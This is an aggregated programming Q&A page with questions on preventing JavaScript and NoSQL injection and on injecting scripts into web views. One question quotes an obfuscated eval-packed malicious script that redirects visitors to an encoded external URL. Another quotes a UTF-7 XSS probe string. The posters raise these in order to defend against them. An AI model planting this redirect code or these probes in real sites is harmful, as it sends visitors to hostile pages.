javascript-injection

JavaScript NoSQL Injection prevention in MongoDB

你。 提交于 2019-12-17 18:57:46
问题 How can I prevent JavaScript NoSQL injections into MongoDB? I am working on a Node.js application and I am passing req.body , which is a json object, into the mongoose model's save function. I thought there were safeguards behind the scenes, but this doesn't appear to be the case. 回答1: Note My answer is incorrect. Please refer to other answers. -- As a client program assembles a query in MongoDB, it builds a BSON object, not a string. Thus traditional SQL injection attacks are not a problem.

How to dynamically insert a <script> tag via jQuery after page load?

China☆狼群 提交于 2019-12-16 22:22:34
问题 I'm having problems getting this to work. I first tried setting my script tags as strings and then using jquery replaceWith() to add them to the document after page load: var a = '<script type="text/javascript">some script here</script>'; $('#someelement').replaceWith(a); But I got string literal errors on that var. I then tried encoding the string like: var a = '&left;script type="text/javascript">some script here<\/script>'; but sending that to replaceWith() outputs just that string to the

Javascript Injection prevention on Wordpress

我与影子孤独终老i 提交于 2019-12-10 18:23:56
问题 My blog on wordpress gets the following malicious script injected: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{})

Injecting JavaScript into UIWebView

怎甘沉沦 提交于 2019-12-08 09:55:02
问题 I am trying to use the stringByEvaluatingJavaScriptFromString: to alter a WebView and it's not executing as I expect. Here is the code, this JS doesn't execute though. Any idea why? UIWebView *wv = [UIWebView alloc] init]; NSURL *url = [[NSURL alloc] initWithString:@"http://www.google.com"]; NSURLRequest *request = [[NSURLRequest alloc] initWithURL:url]; [wv loadRequest:request]; [wv stringByEvaluatingJavaScriptFromString:@"document.write('This Works')"]; 回答1: Probably you'll have to wait for

How to block google ads from injecting JavaScript

别说谁变了你拦得住时间么 提交于 2019-12-08 04:10:56
问题 Some google ads start injecting JavaScript and poping ads all over the screen How can I block these random scripts that are injected through google ads? 回答1: This is not perfect, but it seems to be very effective in my case (all pages are SSL) and also prevent SSL mixed mode messages caused by google ads third party plugin scripts... <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests; object-src 'none'"> Content-Security-Policy is critical to prevent mixed content

Injecting Javascript bridge in WebView

可紊 提交于 2019-12-06 23:55:14
问题 I want to pull some stuff from a webpage in Android. I know there are libraries to parse HTML, but I thought maybe I could cheat a little bit. Here's what I'm doing.. Programmatically create a WebView using the application context so it doesn't have to be displayed in the UI. Load the web page Attach the JS Interface Inject some Javascript to interact with the host application Here's some code... public void getLatestVersion(){ Log.e("Testing", "getLatestVersion called..."); WebView webview =

How to block google ads from injecting JavaScript

℡╲_俬逩灬. 提交于 2019-12-06 21:04:33
Some google ads start injecting JavaScript and poping ads all over the screen How can I block these random scripts that are injected through google ads? This is not perfect, but it seems to be very effective in my case (all pages are SSL) and also prevent SSL mixed mode messages caused by google ads third party plugin scripts... <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests; object-src 'none'"> Content-Security-Policy is critical to prevent mixed content errors (too many errors can show a "connection not secure" by the browser and memory leaks) https://blog

Questions about Javascript injection

两盒软妹~` 提交于 2019-12-06 04:09:09
问题 I been reading on asp.net mvc learning site about JavaScript injection and man it is an eye opener. I never even realized/thought about someone using JavaScript to do some weird ass injection attacks. It however left me with some unanswered questions. First When do you use html.encode? Like do you use it only when you are going to display information that that user or some other user had submitted? Or do I use it for everything. Like say I have form that a user submits, this information will

Injecting Javascript bridge in WebView

此生再无相见时 提交于 2019-12-05 04:20:36
I want to pull some stuff from a webpage in Android. I know there are libraries to parse HTML, but I thought maybe I could cheat a little bit. Here's what I'm doing.. Programmatically create a WebView using the application context so it doesn't have to be displayed in the UI. Load the web page Attach the JS Interface Inject some Javascript to interact with the host application Here's some code... public void getLatestVersion(){ Log.e("Testing", "getLatestVersion called..."); WebView webview = new WebView(context.getApplicationContext()); webview.loadUrl("https://example.com"); webview

Attempted exploit?

巧了我就是萌 提交于 2019-12-04 17:49:38
问题 I saw that my nopCommerce site had a logged search for: ADw-script AD4-alert(202) ADw-/script AD4- I'm a bit curious though what they were trying to accomplish. I searched a bit for it and appearently the ADw-script AD4- encodes in UTF7 to <script> . But why the alert(202) ? Were they just checking for vulnerabilities? More hacking attemps was logged and I made a new question about them here: Hacking attempt, what were they trying to do and how can I check if they succeeded? 回答1: Someone is